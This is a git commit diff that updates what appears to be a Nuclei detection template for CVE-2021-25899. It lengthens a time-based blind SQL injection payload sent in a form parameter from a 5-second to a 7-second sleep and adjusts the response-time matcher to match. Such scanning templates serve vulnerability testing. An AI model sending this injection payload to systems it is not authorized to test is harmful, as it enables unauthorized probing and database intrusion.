Update CVE-2021-25899.yaml

patch-1
J4vaovo 2024-02-06 23:38:31 +08:00 committed by GitHub
parent 3a9a37173f
commit 689ae130b0
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 3 additions and 3 deletions

View File

@ -37,12 +37,12 @@ http:
Host: {{Hostname}} Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
param1=dummy'+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))dummy)--+dummy&param2=test param1=dummy'+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))dummy)--+dummy&param2=test
matchers: matchers:
- type: dsl - type: dsl
dsl: dsl:
- 'duration>=5' - 'duration>=7'
- 'status_code == 200' - 'status_code == 200'
- 'contains(content_type, "text/html")' - 'contains(content_type, "text/html")'
- 'contains(body, "Contacte con el administrador")' - 'contains(body, "Contacte con el administrador")'